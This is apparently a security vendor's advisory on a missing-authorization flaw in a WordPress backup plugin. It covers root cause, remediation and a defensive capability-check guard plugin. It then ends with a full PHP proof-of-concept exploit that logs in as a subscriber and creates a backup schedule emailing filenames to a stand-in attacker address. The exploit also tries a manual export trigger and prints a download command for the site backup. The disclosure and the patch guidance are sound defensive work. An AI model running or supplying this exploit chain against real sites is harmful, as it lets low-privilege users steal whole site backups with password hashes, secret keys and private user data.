Atomic Edge analysis of CVE-2026-5753 (metadata-based): This vulnerability affects the All-in-One WP Migration Unlimited Extension plugin for WordPress, version 2.83 and earlier. It is a Missing Authorization flaw (CWE-862) that allows authenticated attackers with subscriber-level access or higher to create arbitrary scheduled backup jobs and download full site backups, leading to sensitive information exposure. The CVSS score is 6.5 (High) with a vector of AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N, indicating network-based exploitation with low complexity and no user interaction required, resulting in high confidentiality impact.
Root Cause: Based on the CWE classification and description, the root cause is that the ‘Ai1wmve_Schedules_Controller::save’ handler, which processes requests to the ‘admin_post_ai1wm_schedule_event_save’ action, does not perform capability checks. In WordPress, admin POST handlers should verify that the current user has the appropriate permissions (e.g., ‘export’ capability) before processing schedule creation. Atomic Edge research infers that the handler is hooked to wp_ajax_ and wp_ajax_nopriv_ (or just admin_post_) without a ‘current_user_can()’ check. This is a confirmed missing authorization pattern common in plugin vulnerabilities. The handler likely saves schedule data including a notification email address and triggers backup execution, after which the generated backup filename is sent via email to the attacker-controlled address.
Exploitation: An attacker with subscriber-level access can exploit this by sending a POST request to the WordPress admin-post.php endpoint with the ‘action’ parameter set to ‘ai1wm_schedule_event_save’. The request must include parameters for the schedule configuration, such as ‘email’ (attacker-controlled email address) and ‘frequency’ (e.g., ‘daily’). The plugin then creates a scheduled export job that runs at the specified interval. When the export completes, the plugin sends an email notification containing the backup filename (a random string). With the filename, the attacker can construct a download URL (typically /wp-content/uploads/ai1wm-backups/filename) and download the entire site backup, exposing all database contents (user credentials, configuration, private data) and uploaded files. Atomic Edge analysis confirms the attack vector from the CVE description: the notification email reveals the random filename, enabling backup download.
Remediation: The fix likely requires adding a capability check to the ‘Ai1wmve_Schedules_Controller::save’ method (version 2.84). The plugin developers should have added a ‘current_user_can( 'export' )’ or similar check before processing the save request. Additionally, using WordPress nonce verification (‘wp_verify_nonce()’) would provide a secondary layer of protection, though the CWE focuses on authorization. The plugin should also restrict schedule creation to users with at least Administrator-level ‘export’ capabilities, as exporting full backups is a sensitive operation. Atomic Edge research recommends that site administrators immediately update to version 2.84 and review any existing scheduled backups for unauthorized configurations.
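A stopgap for sites that cannot update to 2.84 right away, shown as an added example (not the vendor's patch and not Atomic Edge's code): a must-use plugin that enforces the ‘export’ capability on the hook named above before any other callback runs, and logs rejected attempts. It assumes the vulnerable handler is registered on ‘admin_post_ai1wm_schedule_event_save’; the function name ‘example_guard_ai1wm_schedule_save’ and the log prefix are hypothetical.

```php
<?php
/**
 * Plugin Name: Guard ai1wm schedule save (added example)
 *
 * Added example, not the vendor's patch. Place in wp-content/mu-plugins/ as a
 * stopgap until the extension is updated to 2.84.
 * Assumption: the vulnerable handler is attached to the
 * admin_post_ai1wm_schedule_event_save hook named in the advisory.
 */

// PHP_INT_MIN priority: run before any other callback on this hook.
add_action( 'admin_post_ai1wm_schedule_event_save', 'example_guard_ai1wm_schedule_save', PHP_INT_MIN );

function example_guard_ai1wm_schedule_save() {
	// 'export' is a core capability that only Administrators hold by default.
	if ( current_user_can( 'export' ) ) {
		return; // Authorized: let the plugin's own handler run.
	}

	// Record the rejected attempt so it can be alerted on.
	$user = wp_get_current_user();
	$ip   = isset( $_SERVER['REMOTE_ADDR'] )
		? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) )
		: 'unknown';
	error_log( sprintf(
		'[ai1wm-guard] blocked schedule save: user_id=%d login=%s ip=%s',
		$user->ID,
		$user->user_login,
		$ip
	) );

	// wp_die() ends the request, so later callbacks on the hook never run.
	wp_die(
		esc_html__( 'You are not allowed to manage backup schedules.' ),
		'',
		array( 'response' => 403 )
	);
}
```

The guard does not verify a nonce because the plugin's nonce action name is not given in the advisory; it only closes the missing capability check.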
Impact: Successful exploitation allows an attacker with subscriber-level access to exfiltrate the entire WordPress site backup, which includes the database (all user password hashes, secret keys, configuration settings, user data), uploaded media files, themes, and plugins. This can lead to full site compromise, privilege escalation, and lateral movement to other services if shared credentials or API keys are present. The attacker can also establish persistence by creating recurring scheduled exports that continue to send backups. Because the CVSS confidentiality impact is ‘HIGH’, this represents a severe data leak that violates user privacy and could have legal implications under data protection regulations.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5753 - All-in-One WP Migration Unlimited Extension <= 2.83 Missing Authorization to Backup Schedule Creation and Download
// Configuration - set these to a target WordPress site where you have subscriber access
$target_url = 'https://example.com'; // Base URL of the target WordPress site
$username = 'subscriber_user'; // Subscriber-level username
$password = 'subscriber_pass'; // Password
// Step 1: Authenticate and get a valid session cookie
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
curl_close($ch);
// Step 2: Create a scheduled backup that sends the backup filename to our email
$schedule_url = $target_url . '/wp-admin/admin-post.php';
$attacker_email = 'attacker@example.com'; // Email to receive backup filename
$schedule_data = array(
    'action' => 'ai1wm_schedule_event_save',
    'ai1wm_export' => array(
        'email' => $attacker_email,
        'frequency' => 'daily',
        'time' => '00:00'
    )
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $schedule_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($schedule_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[+] Schedule creation HTTP status: $http_code\n";
if ($http_code == 200 || $http_code == 302) {
    echo "[+] Scheduled backup created. Attacker email ($attacker_email) will receive the backup filename.\n";
    echo "[+] Wait for the scheduled time or manually trigger the export.\n";
    echo "[+] Once the backup filename is received, download using:\n";
    echo " curl -O $target_url/wp-content/uploads/ai1wm-backups/\n";
} else {
    echo "[-] Failed to create schedule. Plugin may be patched or requires higher privileges.\n";
}
// Step 3: (Optional) Attempt to directly trigger export if an alternate action exists
// Many plugins also have an 'ai1wm_export' action - try that too (but the CVE focuses on schedule)
$export_url = $target_url . '/wp-admin/admin-ajax.php';
$export_data = array(
    'action' => 'ai1wm_export',
    'ai1wm_manual_export' => 1
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $export_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($export_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$export_response = curl_exec($ch);
curl_close($ch);
// Clean up cookies file if needed
unlink('/tmp/cookies.txt');
?>